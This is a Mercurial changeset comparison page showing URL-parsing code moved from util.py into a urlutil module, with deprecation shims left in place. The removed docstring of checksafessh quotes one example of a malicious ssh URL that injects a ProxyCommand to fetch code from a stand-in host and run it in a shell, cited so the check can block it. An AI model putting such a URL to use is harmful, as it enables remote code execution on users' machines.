Mercurial > public > mercurial-scm > hg
comparison mercurial/util.py @ 46907:ffd3e823a7e5
urlutil: extract `url` related code from `util` into the new module
The new module is well fitting for this new code. And this will be useful to
make the gathered code collaborate more later.
Differential Revision: https://phab.mercurial-scm.org/D10374
author | Pierre-Yves David <pierre-yves.david@octobus.net> |
---|---|
date | Mon, 12 Apr 2021 03:01:04 +0200 |
parents | 856820b497fc |
children | 9c3e84569071 |
comparison
equal
deleted
inserted
replaced
46906:33524c46a092 | 46907:ffd3e823a7e5 |
---|---|
26 import mmap | 26 import mmap |
27 import os | 27 import os |
28 import platform as pyplatform | 28 import platform as pyplatform |
29 import re as remod | 29 import re as remod |
30 import shutil | 30 import shutil |
31 import socket | |
32 import stat | 31 import stat |
33 import sys | 32 import sys |
34 import time | 33 import time |
35 import traceback | 34 import traceback |
36 import warnings | 35 import warnings |
55 from .utils import ( | 54 from .utils import ( |
56 compression, | 55 compression, |
57 hashutil, | 56 hashutil, |
58 procutil, | 57 procutil, |
59 stringutil, | 58 stringutil, |
59 urlutil, | |
60 ) | 60 ) |
61 | 61 |
62 if pycompat.TYPE_CHECKING: | 62 if pycompat.TYPE_CHECKING: |
63 from typing import ( | 63 from typing import ( |
64 Iterator, | 64 Iterator, |
65 List, | 65 List, |
66 Optional, | 66 Optional, |
67 Tuple, | 67 Tuple, |
68 Union, | |
69 ) | 68 ) |
70 | 69 |
71 | 70 |
72 base85 = policy.importmod('base85') | 71 base85 = policy.importmod('base85') |
73 osutil = policy.importmod('osutil') | 72 osutil = policy.importmod('osutil') |
2957 mapping[prefix_char] = prefix_char | 2956 mapping[prefix_char] = prefix_char |
2958 r = remod.compile(br'%s(%s)' % (prefix, patterns)) | 2957 r = remod.compile(br'%s(%s)' % (prefix, patterns)) |
2959 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) | 2958 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) |
2960 | 2959 |
2961 | 2960 |
2962 def getport(port): | 2961 def getport(*args, **kwargs): |
2963 # type: (Union[bytes, int]) -> int | 2962 msg = b'getport(...) moved to mercurial.utils.urlutil' |
2964 """Return the port for a given network service. | 2963 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2965 | 2964 return urlutil.getport(*args, **kwargs) |
2966 If port is an integer, it's returned as is. If it's a string, it's | 2965 |
2967 looked up using socket.getservbyname(). If there's no matching | 2966 |
2968 service, error.Abort is raised. | 2967 def url(*args, **kwargs): |
2969 """ | 2968 msg = b'url(...) moved to mercurial.utils.urlutil' |
2970 try: | 2969 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2971 return int(port) | 2970 return urlutil.url(*args, **kwargs) |
2972 except ValueError: | 2971 |
2973 pass | 2972 |
2974 | 2973 def hasscheme(*args, **kwargs): |
2975 try: | 2974 msg = b'hasscheme(...) moved to mercurial.utils.urlutil' |
2976 return socket.getservbyname(pycompat.sysstr(port)) | 2975 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2977 except socket.error: | 2976 return urlutil.hasscheme(*args, **kwargs) |
2978 raise error.Abort( | 2977 |
2979 _(b"no port number associated with service '%s'") % port | 2978 |
2980 ) | 2979 def hasdriveletter(*args, **kwargs): |
2981 | 2980 msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' |
2982 | 2981 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2983 class url(object): | 2982 return urlutil.hasdriveletter(*args, **kwargs) |
2984 r"""Reliable URL parser. | 2983 |
2985 | 2984 |
2986 This parses URLs and provides attributes for the following | 2985 def urllocalpath(*args, **kwargs): |
2987 components: | 2986 msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' |
2988 | 2987 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2989 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> | 2988 return urlutil.urllocalpath(*args, **kwargs) |
2990 | 2989 |
2991 Missing components are set to None. The only exception is | 2990 |
2992 fragment, which is set to '' if present but empty. | 2991 def checksafessh(*args, **kwargs): |
2993 | 2992 msg = b'checksafessh(...) moved to mercurial.utils.urlutil' |
2994 If parsefragment is False, fragment is included in query. If | 2993 nouideprecwarn(msg, b'6.0', stacklevel=2) |
2995 parsequery is False, query is included in path. If both are | 2994 return urlutil.checksafessh(*args, **kwargs) |
2996 False, both fragment and query are included in path. | 2995 |
2997 | 2996 |
2998 See http://www.ietf.org/rfc/rfc2396.txt for more information. | 2997 def hidepassword(*args, **kwargs): |
2999 | 2998 msg = b'hidepassword(...) moved to mercurial.utils.urlutil' |
3000 Note that for backward compatibility reasons, bundle URLs do not | 2999 nouideprecwarn(msg, b'6.0', stacklevel=2) |
3001 take host names. That means 'bundle://../' has a path of '../'. | 3000 return urlutil.hidepassword(*args, **kwargs) |
3002 | 3001 |
3003 Examples: | 3002 |
3004 | 3003 def removeauth(*args, **kwargs): |
3005 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') | 3004 msg = b'removeauth(...) moved to mercurial.utils.urlutil' |
3006 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> | 3005 nouideprecwarn(msg, b'6.0', stacklevel=2) |
3007 >>> url(b'ssh://[::1]:2200//home/joe/repo') | 3006 return urlutil.removeauth(*args, **kwargs) |
3008 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> | |
3009 >>> url(b'file:///home/joe/repo') | |
3010 <url scheme: 'file', path: '/home/joe/repo'> | |
3011 >>> url(b'file:///c:/temp/foo/') | |
3012 <url scheme: 'file', path: 'c:/temp/foo/'> | |
3013 >>> url(b'bundle:foo') | |
3014 <url scheme: 'bundle', path: 'foo'> | |
3015 >>> url(b'bundle://../foo') | |
3016 <url scheme: 'bundle', path: '../foo'> | |
3017 >>> url(br'c:\foo\bar') | |
3018 <url path: 'c:\\foo\\bar'> | |
3019 >>> url(br'\\blah\blah\blah') | |
3020 <url path: '\\\\blah\\blah\\blah'> | |
3021 >>> url(br'\\blah\blah\blah#baz') | |
3022 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> | |
3023 >>> url(br'file:///C:\users\me') | |
3024 <url scheme: 'file', path: 'C:\\users\\me'> | |
3025 | |
3026 Authentication credentials: | |
3027 | |
3028 >>> url(b'ssh://joe:xyz@x/repo') | |
3029 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> | |
3030 >>> url(b'ssh://joe@x/repo') | |
3031 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> | |
3032 | |
3033 Query strings and fragments: | |
3034 | |
3035 >>> url(b'http://host/a?b#c') | |
3036 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> | |
3037 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) | |
3038 <url scheme: 'http', host: 'host', path: 'a?b#c'> | |
3039 | |
3040 Empty path: | |
3041 | |
3042 >>> url(b'') | |
3043 <url path: ''> | |
3044 >>> url(b'#a') | |
3045 <url path: '', fragment: 'a'> | |
3046 >>> url(b'http://host/') | |
3047 <url scheme: 'http', host: 'host', path: ''> | |
3048 >>> url(b'http://host/#a') | |
3049 <url scheme: 'http', host: 'host', path: '', fragment: 'a'> | |
3050 | |
3051 Only scheme: | |
3052 | |
3053 >>> url(b'http:') | |
3054 <url scheme: 'http'> | |
3055 """ | |
3056 | |
3057 _safechars = b"!~*'()+" | |
3058 _safepchars = b"/!~*'()+:\\" | |
3059 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match | |
3060 | |
3061 def __init__(self, path, parsequery=True, parsefragment=True): | |
3062 # type: (bytes, bool, bool) -> None | |
3063 # We slowly chomp away at path until we have only the path left | |
3064 self.scheme = self.user = self.passwd = self.host = None | |
3065 self.port = self.path = self.query = self.fragment = None | |
3066 self._localpath = True | |
3067 self._hostport = b'' | |
3068 self._origpath = path | |
3069 | |
3070 if parsefragment and b'#' in path: | |
3071 path, self.fragment = path.split(b'#', 1) | |
3072 | |
3073 # special case for Windows drive letters and UNC paths | |
3074 if hasdriveletter(path) or path.startswith(b'\\\\'): | |
3075 self.path = path | |
3076 return | |
3077 | |
3078 # For compatibility reasons, we can't handle bundle paths as | |
3079 # normal URLS | |
3080 if path.startswith(b'bundle:'): | |
3081 self.scheme = b'bundle' | |
3082 path = path[7:] | |
3083 if path.startswith(b'//'): | |
3084 path = path[2:] | |
3085 self.path = path | |
3086 return | |
3087 | |
3088 if self._matchscheme(path): | |
3089 parts = path.split(b':', 1) | |
3090 if parts[0]: | |
3091 self.scheme, path = parts | |
3092 self._localpath = False | |
3093 | |
3094 if not path: | |
3095 path = None | |
3096 if self._localpath: | |
3097 self.path = b'' | |
3098 return | |
3099 else: | |
3100 if self._localpath: | |
3101 self.path = path | |
3102 return | |
3103 | |
3104 if parsequery and b'?' in path: | |
3105 path, self.query = path.split(b'?', 1) | |
3106 if not path: | |
3107 path = None | |
3108 if not self.query: | |
3109 self.query = None | |
3110 | |
3111 # // is required to specify a host/authority | |
3112 if path and path.startswith(b'//'): | |
3113 parts = path[2:].split(b'/', 1) | |
3114 if len(parts) > 1: | |
3115 self.host, path = parts | |
3116 else: | |
3117 self.host = parts[0] | |
3118 path = None | |
3119 if not self.host: | |
3120 self.host = None | |
3121 # path of file:///d is /d | |
3122 # path of file:///d:/ is d:/, not /d:/ | |
3123 if path and not hasdriveletter(path): | |
3124 path = b'/' + path | |
3125 | |
3126 if self.host and b'@' in self.host: | |
3127 self.user, self.host = self.host.rsplit(b'@', 1) | |
3128 if b':' in self.user: | |
3129 self.user, self.passwd = self.user.split(b':', 1) | |
3130 if not self.host: | |
3131 self.host = None | |
3132 | |
3133 # Don't split on colons in IPv6 addresses without ports | |
3134 if ( | |
3135 self.host | |
3136 and b':' in self.host | |
3137 and not ( | |
3138 self.host.startswith(b'[') and self.host.endswith(b']') | |
3139 ) | |
3140 ): | |
3141 self._hostport = self.host | |
3142 self.host, self.port = self.host.rsplit(b':', 1) | |
3143 if not self.host: | |
3144 self.host = None | |
3145 | |
3146 if ( | |
3147 self.host | |
3148 and self.scheme == b'file' | |
3149 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') | |
3150 ): | |
3151 raise error.Abort( | |
3152 _(b'file:// URLs can only refer to localhost') | |
3153 ) | |
3154 | |
3155 self.path = path | |
3156 | |
3157 # leave the query string escaped | |
3158 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): | |
3159 v = getattr(self, a) | |
3160 if v is not None: | |
3161 setattr(self, a, urlreq.unquote(v)) | |
3162 | |
3163 def copy(self): | |
3164 u = url(b'temporary useless value') | |
3165 u.path = self.path | |
3166 u.scheme = self.scheme | |
3167 u.user = self.user | |
3168 u.passwd = self.passwd | |
3169 u.host = self.host | |
3170 u.path = self.path | |
3171 u.query = self.query | |
3172 u.fragment = self.fragment | |
3173 u._localpath = self._localpath | |
3174 u._hostport = self._hostport | |
3175 u._origpath = self._origpath | |
3176 return u | |
3177 | |
3178 @encoding.strmethod | |
3179 def __repr__(self): | |
3180 attrs = [] | |
3181 for a in ( | |
3182 b'scheme', | |
3183 b'user', | |
3184 b'passwd', | |
3185 b'host', | |
3186 b'port', | |
3187 b'path', | |
3188 b'query', | |
3189 b'fragment', | |
3190 ): | |
3191 v = getattr(self, a) | |
3192 if v is not None: | |
3193 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) | |
3194 return b'<url %s>' % b', '.join(attrs) | |
3195 | |
3196 def __bytes__(self): | |
3197 r"""Join the URL's components back into a URL string. | |
3198 | |
3199 Examples: | |
3200 | |
3201 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) | |
3202 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' | |
3203 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) | |
3204 'http://user:pw@host:80/?foo=bar&baz=42' | |
3205 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) | |
3206 'http://user:pw@host:80/?foo=bar%3dbaz' | |
3207 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) | |
3208 'ssh://user:pw@[::1]:2200//home/joe#' | |
3209 >>> bytes(url(b'http://localhost:80//')) | |
3210 'http://localhost:80//' | |
3211 >>> bytes(url(b'http://localhost:80/')) | |
3212 'http://localhost:80/' | |
3213 >>> bytes(url(b'http://localhost:80')) | |
3214 'http://localhost:80/' | |
3215 >>> bytes(url(b'bundle:foo')) | |
3216 'bundle:foo' | |
3217 >>> bytes(url(b'bundle://../foo')) | |
3218 'bundle:../foo' | |
3219 >>> bytes(url(b'path')) | |
3220 'path' | |
3221 >>> bytes(url(b'file:///tmp/foo/bar')) | |
3222 'file:///tmp/foo/bar' | |
3223 >>> bytes(url(b'file:///c:/tmp/foo/bar')) | |
3224 'file:///c:/tmp/foo/bar' | |
3225 >>> print(url(br'bundle:foo\bar')) | |
3226 bundle:foo\bar | |
3227 >>> print(url(br'file:///D:\data\hg')) | |
3228 file:///D:\data\hg | |
3229 """ | |
3230 if self._localpath: | |
3231 s = self.path | |
3232 if self.scheme == b'bundle': | |
3233 s = b'bundle:' + s | |
3234 if self.fragment: | |
3235 s += b'#' + self.fragment | |
3236 return s | |
3237 | |
3238 s = self.scheme + b':' | |
3239 if self.user or self.passwd or self.host: | |
3240 s += b'//' | |
3241 elif self.scheme and ( | |
3242 not self.path | |
3243 or self.path.startswith(b'/') | |
3244 or hasdriveletter(self.path) | |
3245 ): | |
3246 s += b'//' | |
3247 if hasdriveletter(self.path): | |
3248 s += b'/' | |
3249 if self.user: | |
3250 s += urlreq.quote(self.user, safe=self._safechars) | |
3251 if self.passwd: | |
3252 s += b':' + urlreq.quote(self.passwd, safe=self._safechars) | |
3253 if self.user or self.passwd: | |
3254 s += b'@' | |
3255 if self.host: | |
3256 if not (self.host.startswith(b'[') and self.host.endswith(b']')): | |
3257 s += urlreq.quote(self.host) | |
3258 else: | |
3259 s += self.host | |
3260 if self.port: | |
3261 s += b':' + urlreq.quote(self.port) | |
3262 if self.host: | |
3263 s += b'/' | |
3264 if self.path: | |
3265 # TODO: similar to the query string, we should not unescape the | |
3266 # path when we store it, the path might contain '%2f' = '/', | |
3267 # which we should *not* escape. | |
3268 s += urlreq.quote(self.path, safe=self._safepchars) | |
3269 if self.query: | |
3270 # we store the query in escaped form. | |
3271 s += b'?' + self.query | |
3272 if self.fragment is not None: | |
3273 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) | |
3274 return s | |
3275 | |
3276 __str__ = encoding.strmethod(__bytes__) | |
3277 | |
3278 def authinfo(self): | |
3279 user, passwd = self.user, self.passwd | |
3280 try: | |
3281 self.user, self.passwd = None, None | |
3282 s = bytes(self) | |
3283 finally: | |
3284 self.user, self.passwd = user, passwd | |
3285 if not self.user: | |
3286 return (s, None) | |
3287 # authinfo[1] is passed to urllib2 password manager, and its | |
3288 # URIs must not contain credentials. The host is passed in the | |
3289 # URIs list because Python < 2.4.3 uses only that to search for | |
3290 # a password. | |
3291 return (s, (None, (s, self.host), self.user, self.passwd or b'')) | |
3292 | |
3293 def isabs(self): | |
3294 if self.scheme and self.scheme != b'file': | |
3295 return True # remote URL | |
3296 if hasdriveletter(self.path): | |
3297 return True # absolute for our purposes - can't be joined() | |
3298 if self.path.startswith(br'\\'): | |
3299 return True # Windows UNC path | |
3300 if self.path.startswith(b'/'): | |
3301 return True # POSIX-style | |
3302 return False | |
3303 | |
3304 def localpath(self): | |
3305 # type: () -> bytes | |
3306 if self.scheme == b'file' or self.scheme == b'bundle': | |
3307 path = self.path or b'/' | |
3308 # For Windows, we need to promote hosts containing drive | |
3309 # letters to paths with drive letters. | |
3310 if hasdriveletter(self._hostport): | |
3311 path = self._hostport + b'/' + self.path | |
3312 elif ( | |
3313 self.host is not None and self.path and not hasdriveletter(path) | |
3314 ): | |
3315 path = b'/' + path | |
3316 return path | |
3317 return self._origpath | |
3318 | |
3319 def islocal(self): | |
3320 '''whether localpath will return something that posixfile can open''' | |
3321 return ( | |
3322 not self.scheme | |
3323 or self.scheme == b'file' | |
3324 or self.scheme == b'bundle' | |
3325 ) | |
3326 | |
3327 | |
3328 def hasscheme(path): | |
3329 # type: (bytes) -> bool | |
3330 return bool(url(path).scheme) # cast to help pytype | |
3331 | |
3332 | |
3333 def hasdriveletter(path): | |
3334 # type: (bytes) -> bool | |
3335 return bool(path) and path[1:2] == b':' and path[0:1].isalpha() | |
3336 | |
3337 | |
3338 def urllocalpath(path): | |
3339 # type: (bytes) -> bytes | |
3340 return url(path, parsequery=False, parsefragment=False).localpath() | |
3341 | |
3342 | |
3343 def checksafessh(path): | |
3344 # type: (bytes) -> None | |
3345 """check if a path / url is a potentially unsafe ssh exploit (SEC) | |
3346 | |
3347 This is a sanity check for ssh urls. ssh will parse the first item as | |
3348 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. | |
3349 Let's prevent these potentially exploited urls entirely and warn the | |
3350 user. | |
3351 | |
3352 Raises an error.Abort when the url is unsafe. | |
3353 """ | |
3354 path = urlreq.unquote(path) | |
3355 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): | |
3356 raise error.Abort( | |
3357 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) | |
3358 ) | |
3359 | |
3360 | |
3361 def hidepassword(u): | |
3362 # type: (bytes) -> bytes | |
3363 '''hide user credential in a url string''' | |
3364 u = url(u) | |
3365 if u.passwd: | |
3366 u.passwd = b'***' | |
3367 return bytes(u) | |
3368 | |
3369 | |
3370 def removeauth(u): | |
3371 # type: (bytes) -> bytes | |
3372 '''remove all authentication information from a url string''' | |
3373 u = url(u) | |
3374 u.user = u.passwd = None | |
3375 return bytes(u) | |
3376 | 3007 |
3377 | 3008 |
3378 timecount = unitcountfn( | 3009 timecount = unitcountfn( |
3379 (1, 1e3, _(b'%.0f s')), | 3010 (1, 1e3, _(b'%.0f s')), |
3380 (100, 1, _(b'%.1f s')), | 3011 (100, 1, _(b'%.1f s')), |